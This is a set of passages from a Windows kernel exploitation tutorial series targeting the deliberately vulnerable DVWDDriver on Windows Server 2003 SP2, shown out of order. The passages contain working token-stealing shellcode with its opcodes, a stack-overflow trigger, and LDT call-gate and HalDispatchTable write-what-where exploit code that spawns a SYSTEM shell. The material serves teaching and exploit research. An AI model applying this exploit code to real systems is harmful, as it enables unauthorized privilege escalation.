         +0x000 MinorVersion     : 1
         +0x002 MajorVersion     : 1
         +0x004 CurrentThread    : 0x80896e40 _KTHREAD
         +0x008 NextThread       : (null)
         +0x00c IdleThread       : 0x80896e40 _KTHREAD
         [...]
      
      
      kd> dt nt!_kthread 0x80896e40
         +0x000 Header           : _DISPATCHER_HEADER
         +0x010 MutantListHead   : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ]
         +0x018 InitialStack     : 0x808948b0 Void
         +0x01c StackLimit       : 0x808918b0 Void
         +0x020 KernelStack      : 0x808945fc Void
         +0x024 ThreadLock       : 0
         +0x028 ApcState         : _KAPC_STATE
         +0x028 ApcStateFill     : [23]  "hn???"
         +0x03f ApcQueueable     : 0x1 ''
         [...]
         
         
      kd> dt nt!_kapc_state 0x80896e40+0x28
         +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ]
         +0x010 Process          : 0x808970c0 _KPROCESS
         +0x014 KernelApcInProgress : 0 ''
         +0x015 KernelApcPending : 0 ''
         +0x016 UserApcPending   : 0 ''
         
      kd> dt nt!_eprocess 0x808970c0
         +0x000 Pcb              : _KPROCESS
         +0x078 ProcessLock      : _EX_PUSH_LOCK
         +0x080 CreateTime       : _LARGE_INTEGER 0x0
         +0x088 ExitTime         : _LARGE_INTEGER 0x0
         +0x090 RundownProtect   : _EX_RUNDOWN_REF
         +0x094 UniqueProcessId  : (null)
         +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
         +0x0a0 QuotaUsage       : [3] 0
         +0x0ac QuotaPeak        : [3] 0
         +0x0b8 CommitCharge     : 0
         +0x0bc PeakVirtualSize  : 0
         +0x0c0 VirtualSize      : 0
         +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
         +0x0cc DebugPort        : (null)
         +0x0d0 ExceptionPort    : (null)
         +0x0d4 ObjectTable      : 0xe1000c60 _HANDLE_TABLE
         +0x0d8 Token            : _EX_FAST_REF
         +0x0dc WorkingSetPage   : 0x17f40
         [...]
         
      kd> dt nt!_list_entry
         +0x000 Flink            : Ptr32 _LIST_ENTRY
         +0x004 Blink            : Ptr32 _LIST_ENTRY
      
      kd> dt nt!_token -r1 @@(0xe1001727 & ~7)
         +0x000 TokenSource      : _TOKEN_SOURCE
            +0x000 SourceName       : [8]  "*SYSTEM*"
            +0x008 SourceIdentifier : _LUID
         +0x010 TokenId          : _LUID
            +0x000 LowPart          : 0x3ea
            +0x004 HighPart         : 0n0
         +0x018 AuthenticationId : _LUID
            +0x000 LowPart          : 0x3e7
            +0x004 HighPart         : 0n0
         +0x020 ParentTokenId    : _LUID
            +0x000 LowPart          : 0
            +0x004 HighPart         : 0n0
         +0x028 ExpirationTime   : _LARGE_INTEGER 0x6207526`b64ceb90
            +0x000 LowPart          : 0xb64ceb90
            +0x004 HighPart         : 0n102790438
            +0x000 u                : __unnamed
            +0x000 QuadPart         : 0n441481572610010000
         [...]
      

      From this, we can deduce the following offsets that will be useful for writing the shellcode for Windows Server 2003 SP2:

      • _KTHREAD: located at fs:[0x124] (where the FS segment descriptor points to _KPCR)
      • _EPROCESS: 0x38 from the beginning of _KTHREAD
      • _EPROCESS.ActiveProcessLinks: it is a double-linked list that links all the _EPROCESS structures (for all the processes). It's located at the offset 0x98 from the beginning of _EPROCESS. It also corresponds to the pointer to the next element (Flink) in this double-linked list.
      • _EPROCESS.UniqueProcessId: It is the PID of the corresponding process. It is located at the offset 0x94 from the beginning of _EPROCESS.
      • _EPROCESS.Token: This is the structure that contains the Access Token. The offset in _EPROCESS is 0xD8. Note that it must be aligned by 8.
      .486
      .model flat,stdcall
      option casemap:none
      include \masm32\include\windows.inc
      include \masm32\include\kernel32.inc
      includelib \masm32\lib\kernel32.lib
      assume fs:nothing
      
      .code
      
      shellcode:
      
      ; ----------------------------------------------------------------------
      ;                  Shellcode for Windows Server 2k3
      ; ----------------------------------------------------------------------
      
      ; Offsets
      WIN2K3_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
      WIN2K3_EPROCESS_OFFSET  equ 038h    ; nt!_KTHREAD.ApcState.Process
      WIN2K3_FLINK_OFFSET     equ 098h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
      WIN2K3_PID_OFFSET       equ 094h    ; nt!_EPROCESS.UniqueProcessId
      WIN2K3_TOKEN_OFFSET     equ 0d8h    ; nt!_EPROCESS.Token
      WIN2K3_SYS_PID          equ 04h     ; PID Process SYSTEM
      
      
      pushad                                ; save registers
      
      mov eax, fs:[WIN2K3_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
      mov eax, [eax+WIN2K3_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
      push eax
      
      
      mov ebx, WIN2K3_SYS_PID
      
      SearchProcessPidSystem:
      
      mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
      sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
      cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == SYSTEM PID ?
      jne SearchProcessPidSystem            ; if no, retry with the next process...
      
      mov edi, [eax+WIN2K3_TOKEN_OFFSET]    ; EDI <- Token of process with SYSTEM PID
      and edi, 0fffffff8h                   ; Must be aligned by 8
      
      pop eax                               ; EAX <- current _EPROCESS 
      
      
      mov ebx, 41414141h
      
      SearchProcessPidToEscalate:
      
      mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
      sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
      cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == PID of the process 
                                            ; to escalate ?
      jne SearchProcessPidToEscalate        ; if no, retry with the next process...
      
      SwapTokens:
      
      mov [eax+WIN2K3_TOKEN_OFFSET], edi    ; We replace the token of the process 
                                            ; to escalate by the token of the process
                                            ; with SYSTEM PID
      
      PartyIsOver:
      
      popad                                 ; restore registers
      mov edx, 11111111h                    ; EIP value after SYSEXIT
      mov ecx, 22222222h                    ; ESP value after SYSEXIT
      mov eax, 3Bh                          ; FS value in userland (points to _TEB)
      db 8Eh, 0E0h                          ; mov fs, ax
      db 0Fh, 35h                           ; SYSEXIT
      
      end shellcode

      We assemble this asm code with MASM and we retrieve the corresponding sequence of opcodes (Tools > Load Binary File as Hex)... we get:
      00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00
      00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00
      00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41
      00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94
      00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11
      00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00

      Of course, before using this shellcode, it's necessary to replace the PID value of the process to escalate, the EIP and ESP values after SYSEXIT. We'll do that in the code before sending the buffer.

      5. Methodology of exploitation

      The exploitation process is the following:

      1. Create an executable memory area and put the previous shellcode (for swapping tokens) in that area.
      2. Similarly, create an executable memory area and put the shellcode that must be executed after the privilege escalation (the payload)
      3. Update the first shellcode with: PID of the process to escalate, EIP to use after SYSEXIT, ESP to use after SYSEXIT. The method is taken from [4].
      4. Create an anonymous map for our buffer
      5. Fill this map with the address of the first shellcode
      6. Adjust the pointer to the buffer in such a way that the last 4 bytes are in an unmapped memory area
      7. Send the buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL.

      6. Exploit code

      Here is the main function of the exploit. It should be quite straightforward after the previous explanations.

      VOID TriggerOverflow32(VOID) {
      
       HANDLE hFile;
       DWORD dwReturn;
       UCHAR* map;
       UCHAR *uBuff = NULL;
       BOOL ret;
       ULONG_PTR pShellcode;
      
       // Load the Kernel Executive ntoskrnl.exe in userland and get some 
       // symbol's kernel address
       if(LoadAndGetKernelBase() == FALSE)
        return;
      
       
       // Put the shellcodes in executable memory
       mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1);
       mapShellcodePayload    = (UCHAR *)CreateUspaceExecMapping(1);
      
       memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity);
       memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity);
      
       RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
       RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload));
      
      
       // Added
       printf("[~] Update Shellcode with PID of the process...\n");
       if(!MajShellcodePid(L"DVWDExploit.exe")) {
        printf("[!] An error occured, exitting...\n");
        return;
       }
      
       printf("[~] Update Shellcode with EIP to use after SYSEXIT...\n");
       if(!MajShellcodeEip()) {
        printf("[!] An error occured, exitting...\n");
        return;
       }
      
       printf("[~] Update Shellcode with ESP to use after SYSEXIT...\n");
       if(!MajShellcodeEsp()) {
        printf("[!] An error occured, exitting...\n");
        return;
       }
       
       printf("[~] Retrieve the address of the shellcode and build the buffer...\n");
      
       // Create an anonymous map
       map = (UCHAR *)CreateUspaceMapping(1);
       // Retrieve the address of the shellcode
       pShellcode = (ULONG_PTR)mapShellcodeSwapTokens;
       
       // We fill the map with the address of our shellcode (the address is repeated)
       FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity);
      
       // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the 
       // last 4 bytes are in an unmapped memory area
       uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR));
      
       // Now, we send our buffer to the driver and trigger the overflow
       hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
       deviceHandle = hFile;
      
       if(hFile != INVALID_HANDLE_VALUE)
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL);
      
       // If you get here the vulnerability has not been triggered ...
       printf("[!] Stack overflow has not been triggered, maybe the driver has not been loaded ?\n");
       return;
      }

      6. All your base are belong to us


      For testing purpose, I've put a simple windows/exec calc.exe shellcode from Metaploit for the payload. However, we can put what we want...


      Our calc.exe is running with NT AUTHORITY\SYSTEM privileges, so it means the privilege escalation has succeeded and then, the payload has been well executed.


      References

      [1] CreateFileMapping() function
      http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

      [2] MapViewOfFileEx() function 
      http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

      [3] Remote Debugging using VMWare
      http://www.catch22.net/tuts/vmware

      [4] Local Stack Overflow in Windows Kernel, by Heurs
      http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

      [5] Exploiting Windows Device Drivers, by Piotr Bania
      http://pb.specialised.info/all/articles/ewdd.pdf

      Windows Kernel Exploitation Basics - Part 3 : Arbitrary Memory Overwrite exploitation using LDT



      In the previous post, we've seen an exploitation of the write-what-where vulnerability in DVWDDriver based on the overwriting of a pointer located into the kernel dispatch table HalDispatchTable. This technique relies on an undocumented syscall, and so the problem with such a technique is that it is not guaranteed to remain in the same form in the next system updates as it is well pointed out in the great paper [1]. Instead, the new technique detailed in this post is based on the hardware-specific structures GDT and LDT that are more likely to remain the same across the different Windows versions. This is another method that is briefly presented in the book "A guide to Kernel Exploitation". First of all, background about GDT and LDT is required, so we'll take our Intel Manual and see that now =)

      1. Windows GDT and LDT

      According to the Intel Manual [2], Segmentation is implemented using Segment Selector which is a 16-bit value. Actually, a Logical Address is composed of:
      • An offset address, which is a 32-bits value,
      • A Segment Selector, which is a 16-bits value.
      Because a figure permits to avoid a long speech, here's a global overview of Segmentation and Paging mechanisms (Logical address -> Linear address -> Physical address):



        The previous figure shows how the logical address is translated into a linear address thanks to Segmentation. Then, we can see that the Paging mechanism comes in play. Basically, it consists in translating the linear address into physical address. It is actually an Intel optional feature but if not used, linear address == physical address. Windows uses Paging and so, the linear address is just another structure split into 3 subfields. The values of those subfields are used as offsets into arrays in order to get the physical address.

        Moreover, we can see that the Segment Selector references an entry in a table and this entry actually describes a segment (Segment Descriptor) in linear address space: this table is the GDT. Ok, but how's really working and wtf is that LDT ?! Let's go back to our Intel Manual... =)

        We learn that GDT (Global Descriptor Table) and LDT (Local Descriptor Table) are the 2 kinds of Segment Descriptors tables. We can also see this awesome figure:



        Having a GDT is mandatory for a system, every system must create one when it starts up. There is a single GDT per processor for the entire system (that's why it's a "global" table) and that can be shared by all tasks on the system. Using a LDT is actually optional ; it can nevertheless be used by a single task or a group of tasks that are in relation. A LDT is defined as a single GDT entry and it is specific to a process, which means that the entry is replaced into the GDT during a process-context switch.

        To give more details, the GDT normally contains:
        • A pair of kernel-mode code and data Segment Descriptors, with DPL = 0 (the DPL defines the privilege level of the segment being referenced, ie. the ring)
        • A pair of user-mode code and data Segment Descriptors, with DPL = 3
        • One TSS (Task State Segment), with DPL = 0. See [3]
        • 3 Additional data segment entries.
        • An optional LDT entry
        By default, a new process doesn't have any LDT defined, however it can be allocated if the process sends a demand to create it. If a process has a corresponding LDT, a pointer can be found in the LdtDescriptor field of the kernel structure _KPROCESS corresponding to the process in question:

        kd> dt nt!_kprocess
           +0x000 Header           : _DISPATCHER_HEADER
           +0x010 ProfileListHead  : _LIST_ENTRY
           +0x018 DirectoryTableBase : [2] Uint4B
           +0x020 LdtDescriptor    : _KGDTENTRY
           +0x028 Int21Descriptor  : _KIDTENTRY
           [...]
        

        2. Call-Gate

        A Call-Gate permits to access code segments with different privilege levels:
        "Call-Gates facilitate controlled transfers of program control between different privilege levels. They are typically used only in operating systems or executives that use the privilege-level mechanism" (Intel Manual Vol. 3A & 3B [2], p. 201).

        A Call-Gate is a possible entry into GDT or LDT. It is a special sort of descriptor called a Call-Gate Descriptor. It's the same size as a Segment Descriptor (8 bytes), but some fields aren't organized in the same way. The figure below is taken from [1] and clearly shows the differences:



        In practice, a Call-Gate is useful in order to jump to a code located to a different segment and running with different privileges (ring). Here's how things are working when we're calling a Call-Gate:
        1. The processor accesses the Call-Gate Descriptor,
        2. It locates the Code Segment Descriptor we finally want to access, by using the Segment Selector contained into the Call-Gate Descriptor,
        3. It retrieves the Base Address contained into the Code Segment Descriptor and adds to it the offset value contained into the Call-Gate Descriptor.
        4. The result is the linear address of the code we want to access (Code linear address = Base Address + Offset).

        The article [4] (in french) explains how we can add a Call-Gate that permits to run code in Ring0 from Ring3. So, I'll not repeat all what it's said in that great article, but just what is useful for us right now:

        • The "Segment Selector" field must refer to the Segment Descriptor under which our payload will be executed. Because we want to run it with full privileges in Ring0, we'll refer to the Kernel Code Segment (CS) Descriptor. The right value is 0x0008.
        • The "DPL" field must be equal to 3 if we want to be able to access the Call-Gate from the userland.
        • The "Offset" field must be the address of the code we want to execute.
        • The "Type" field must be equal to 12 for Call-Gate Descriptor.
        After that, we need to know how to call our Call-Gate...
        For that, we'll use the x86 instruction FAR CALL (0x9A). It's different from a classic CALL because we must specify an offset (32-bits) AND a Segment Selector (16-bits). In our case, we just need to put the right value for the Segment Selector, and we just have to leave the index at 0x00000000. Indeed, here we're doing like a call in two times; I mean the first call is aimed to reach the Call-Gate Descriptor and then the Call-Gate Descriptor points to the code we want to execute. Let's see how is built a Segment Selector:
        So:
        • Bits 0,1: we call the Call-Gate from userland, so we'll put the value 11 (3 in decimal for Ring3) here;
        • Bit 2: we'll put the value 1 because we'll put our Call-Gate Descriptor into LDT;
        • Bits 3..15: this is the index into GDT/LDT (here into LDT). We'll put our Call-Gate at the first position into the LDT, so we'll put the value 0 here.

        3. Methodology of exploitation

        Now that we've got the background about GDT and LDT we can move on to the exploitation...
        Basically, the exploitation consists in creating a new LDT. Then, we add a new entry into that LDT - just one entry - a Call-Gate Descriptor by putting the right values in the fields as it was explained before...


        And then, we need to use the write-what-where vulnerability in order to overwrite the LDT descriptor into the GDT by a descriptor corresponding to the fake LDT that has been previously created. Here:
        • what = LDT descriptor of the fake LDT,
        • where = location of the LDT descriptor into the GDT. The LDT is represented by a KGDTENTRY structure called LdtDescriptor, that is an entry into the _KPROCESS structure (structure used by the kernel to store information about a specific process) as we've seen before. So, we can get the address of where we want to write by retrieving the address of _KPROCESS (== address of _EPROCESS) and adding to it the right offset value (0x20 for Windows Server 2003 SP2). 
        Finally, we can call our Call-Gate by making a FAR CALL on the first (and only) entry into the LDT of the current process. This will permit to jump to our shellcode.

        4. Shellcoding

        Okay, we've briefly seen how the exploitation is working. We will re-use the shellcode used in the previous article about exploiting write-what-where vulnerabilities with HalDispatchTable. But there is an additional problem here... we need to be able to return from the Call-Gate after the execution of our payload. A FAR CALL will be made to jump to the Call-Gate, that's to say the segment where EIP is pointing will change, and so we need to make a FAR RET (0xCB) and not a simple RET after the execution. By doing so, we will be able to move on to the next instruction into our exploit program.

        Moreover, it's important to remember that the FS segment descriptor is pointing to the KPCR structure (Kernel Processor Control Region) in kernel-mode, but not in user-mode where it is pointing to the TEB structure (Thread Execution Block). Indeed:
        • In Kernel-Mode, FS=0x30
        • In User-Mode, FS=0x3B
        Therefore, we have to correctly set FS to the value 0x30 before executing our shellcode in kernelland, and then we must put its value back to 0x3B before returning.

        This is for the two previous reasons that the authors of the DVWDExploit have written a wrapper (ReturnFromGate) in ASM that performs those operations. This is the address of this wrapper that must be put into the Offset field of the Call-Gate Descriptor.

        5. Exploitation in details

        Okay, we've got all the elements to fully understand the exploit. Here is how it works:
        1. Retrieve the address of the payload that will be executed in Kernel-mode (named KernelPayload), that's to say the code to patch the current process' Access Token.
        2. Retrieve the address of the _KPROCESS structure.
        3. Retrieve the address of the LDT descriptor into the GDT, located at address of _KPROCESS + offset (0x20)
        4. Create a new LDT using the ZwSetInformationProcess() syscall within ntdll.dll. This is done in the function called SetLDTEnv().
        5. Put the address KernelPayload into the wrapper ReturnFromGate to be able to call the shellcode from it. Then, put this wrapper into executable memory.
        6. Build the Call-Gate Descriptor in the function called PrepareCallGate32(). Well, we've already seen how to correctly fill the fields of the Call-Gate in order to be able to run code in Ring0 from Ring3.
        7. Build the LDT Descriptor that corresponds to the previously created LDT. This is done by the function called PrepareLDTDescriptor32()
        8. Overwrite the LDT descriptor into the GDT by the one corresponding to the fake LDT that has been previously created, by using the vulnerability:
          • Store the new LDT descriptor into the GlobalOverwriteStruct thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE.
          • Write this new LDT descriptor - contained into GlobalOverwriteStruct - at the location of the existing LDT descriptor into GDT, thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE.
        9. Then, we need to force a process context switch. Indeed, the LDT Segment Descriptor into the GDT is updated only after a context switch. To do so, we just sleep for some time.
        10. Finally, we make our FAR CALL to the Call-Gate. That will trigger the execution of the wrapper and then of our shellcode in kernel-mode.
        11. When we return from our shellcode, the process is running with Owner SID = NT AUTHORITY\SYSTEM, so we can do what we want ! 
        A figure might help to understand... =) 




        6. Exploit code

        Here is a code snippet from DVWDExploit with many comments I've added. The full code is available in the archive:

        // ----------------------------------------------------------------------------
        // Arbitrary Memory Overwrite exploitation ------------------------------------
        // ---- Method using LDT  -----------------------------------------------------
        // ----------------------------------------------------------------------------
        
        
        typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                               PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                               PPROCESS_LDT_INFORMATION ProcessInformation,
                               ULONG ProcessInformationLength);    
        
        // Fill the Call-Gate Descriptor -------------------------------------------------
        VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {
        
         ULONG_PTR IPayload = (ULONG_PTR)Payload;
        
         RtlZeroMemory(pGate, sizeof(CALL_GATE32));
         
         pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
         pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
         pGate->Fields.Type     = 12;   // Gate Descriptor
         pGate->Fields.Param    = 0;
         pGate->Fields.Present    = 1;
         pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
         pGate->Fields.Dpl     = 3;
        }
        
        // Setup the LDT descriptor ------------------------------------------------------
        VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {
        
         ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;
        
         RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));
         
         pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
         pLDTDesc->LimitLow     = 0xFFFF;
         pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
         pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
         pLDTDesc->HighWord.Bits.Type = 2;
         pLDTDesc->HighWord.Bits.Pres  = 1;
        }
        
        
        // Assembly wrapper to the payload to be able to return from the Call-Gate ------
        // (using a FAR RET)
        #define OFFSET_SHELLCODE 18
        CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
               "\x60"                  // pushad       save general purpose registers
               "\x0F\xA0"              // push  fs     save FS segment register
               "\x66\xB8\x30\x00"      // mov  ax, 30h   
               // FS value is different between userland (0x3B) and kernelland (0x30)
               "\x8E\xE0"              // mov  fs, ax     
               "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
               "\xFF\xD0"              // call  eax  
               "\x0F\xA1"              // pop   fs     restore general purpose registers
               "\x61"                  // popad        restore FS segment register
               "\xcb";                 // retf       far ret
        
               
        // Assembly code that executes a CALL to 0007:00000000 ----------------------------
        // (Segment selector: 0x0007, offset address: 0x00000000)
        // 16-bit segment selector:
        // [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
        // [Requested Privilege Level: 00=ring0/11=ring3]
        // => 0007 means: index 0 into GDT (first entry), descriptor in LDT, ring3
        VOID FarCall() {
         __asm { 
           _emit 0x9A
           _emit 0x00
           _emit 0x00
           _emit 0x00
           _emit 0x00
           _emit 0x07
           _emit 0x00
         }
        }
        
        // Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
        BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {
        
         HANDLE hFile;
         ARBITRARY_OVERWRITE_STRUCT overwrite;
         ULONG64 storage = LDTDesc;
         BOOL ret;
         DWORD dwReturn;
        
         hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
        
         if(hFile != INVALID_HANDLE_VALUE) {
          overwrite.Size = 8;
          overwrite.StorePtr = (PVOID)&storage;
          ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
        
          overwrite.Size = 8;
          overwrite.StorePtr = (PVOID)KGDTEntry;
          ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
        
          CloseHandle(hFile);
        
          return TRUE;
         }
        
         return FALSE;
        }
        
        
        // Create a new LDT using ZwSetInformationProcess ----------------------------------
        BOOL SetLDTEnv(VOID) {
        
         NTSTATUS retStatus;
         LDT_ENTRY eLdt;
         PROCESS_LDT_INFORMATION infoLdt; 
         _ZwSetInformationProcess ZwSetInformationProcess;
        
         // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
         ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");
        
         if(!ZwSetInformationProcess)
          return FALSE;
        
         // Create and initialize a new LDT
         RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));
        
         RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
         infoLdt.Start = 0;
         infoLdt.Length = sizeof(LDT_ENTRY);
        
         retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
                     ProcessLdtInformation, 
                     &infoLdt, 
                     sizeof(PROCESS_LDT_INFORMATION));
        
         if(retStatus != STATUS_SUCCESS)
          return FALSE;
        
         return TRUE;
        }
        
        
        #define LDT_DESC_FROM_KPROCESS 0x20
        ULONG64 LDTDescStorage32=0;
        
        // Main function -------------------------------------------------------------------
        BOOL LDTDescOverwrite32(VOID) {
        
         PVOID kprocess,kprocessLDTDesc;
         PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
         PVOID ReturnFromGateArea = NULL;
         PCALL_GATE32 pGate = NULL;
        
         // User standard SIDList Patch
         FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;
        
         // Retrieve the KPROCESS Address == EPROCESS Address
         kprocess = FindCurrentEPROCESS();
         if(!kprocess)
          return FALSE;
        
         // Address of LDT Descriptor
         // kd> dt nt!_kprocess
         kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
         printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);
        
         // Create a new LDT entry
         if(!SetLDTEnv())
          return FALSE;
        
         // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
         // and put it into executable memory
         RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
         ReturnFromGateArea = CreateUspaceExecMapping(1);
         RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));
        
         // Build the Call-Gate(system descriptor), we pass the address of the shellcode
         pGate = CreateUspaceMapping(1);
         PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);
        
         // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
         PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);
        
         printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);
        
         // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
         OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);
         
         // We force a process context switch
         // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
         // switch. So, it's needed before being able to use the Call-Gate
         Sleep(1000);
        
         // Trigger the call gate via a FAR CALL (see assembly code)
         FarCall();
        
         return TRUE;
        }
        
        
        // This is where we begin ... ------------------------------------------------
        BOOL TriggerOverwrite32_LDTRemappingWay() {
         
         // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
         if(LoadAndGetKernelBase() == FALSE)
          return FALSE;
        
         // We exploit the vulnerability with a payload that patches the SID list to get 
         // SYSTEM privilege and then we spawn a shell if it succeeds
         if(LDTDescOverwrite32() == TRUE) {
          if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
           wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
           return FALSE;
          }
         }
         
         return TRUE;
        }
        


        7. w00t ?


        The exploit is working well as we can see:

        w00t again !!


        References

        [1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew "j00ru" Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

        [2] Intel Manual Vol. 3A & 3B
        http://www.intel.com/products/processor/manuals/

        [3]
        Task State Segment (TSS)

        Windows Kernel Exploitation Basics - Part 2 : Arbitrary Memory Overwrite exploitation using HalDispatchTable



        In this article, we will see a method to exploit the write-what-where vulnerability (Arbitrary Memory Overwrite) present in the DVWDDriver. This method consists in overwriting a pointer in a kernel dispatch table. Such tables are used by the kernel to store various pointers. Example of such tables:
        • The SSDT (System Service Descriptor Table) nt!KeServiceDescriptorTable stores addresses of syscalls; it is used by the kernel in order to dispatch syscalls (more information in [1]).
        • The HAL Dispatch Table nt!HalDispatchTable. HAL (Hardware Abstraction Layer) is used in order to isolate the OS from the hardware. Basically, it permits to run the same OS on machines with different hardwares. This table stores pointers to routines used by the HAL.
        Here, we will overwrite a specific pointer into the HalDispatchTable. Let's see why and how... =) The big reference for everything that is sum up here is the paper [2].

        1. NtQueryIntervalProfile() and HalDispatchTable

        According to [3], NtQueryIntervalProfile() is an undocumented system call exported by ntdll.dll that retrieves currently set delay between performance counter's ticks. It calls the KeQueryIntervalProfile() function exported by the kernel executive ntoskrnl.exe. If we disassemble that function, we can see the following:



        So, a call to the routine located at the address nt!HalDispatchTable+0x4 is done (see the red box). Therefore, if we overwrite the pointer at that address - that's to say the second pointer into the HalDispatchTable - with the address of our shellcode; and then if we call the function NtQueryIntervalProfile(), our shellcode will be executed !


        2. Methodology of exploitation

        Note: GlobalOverwriteStruct is the global structure used by the driver for storing a buffer and its size.

        In order to exploit the Arbitrary Memory Overwrite vulnerability, the basic idea is to:
        1. Use the DVWDDriver's IOCTL DEVICOIO_DVWD_STORE in order to store the address of our shellcode into the buffer of the structure GlobalOverwriteStruct that lies in kernelland. Remember that the address we pass in parameter must be in the user memory address space (ie. address <= 0x7FFFFFFF) because a check is done in the IOCTL handler using the function ProbeForRead(). Ok, no problem, we just pass a pointer to the address of our shellcode (of course, it points to userland) ! So, the struct we pass to the driver contains this pointer and the value 4 for the size of the buffer.
        2. Then, use the DVWDDriver's IOCTL DEVICOIO_DVWD_OVERWRITE in order to write the content of the buffer located at the address stored into the buffer of GlobalOverwriteStruct - that's to say the previously added address of the shellcode - at the address passed in parameter. Remember that this time, there is no check in the IOCTL handler and so, this address can be everywhere, whether in userland or in kernelland. Therefore, we will pass  the address of the second entry in the HalDispatchTable, of course this is in kernelland.
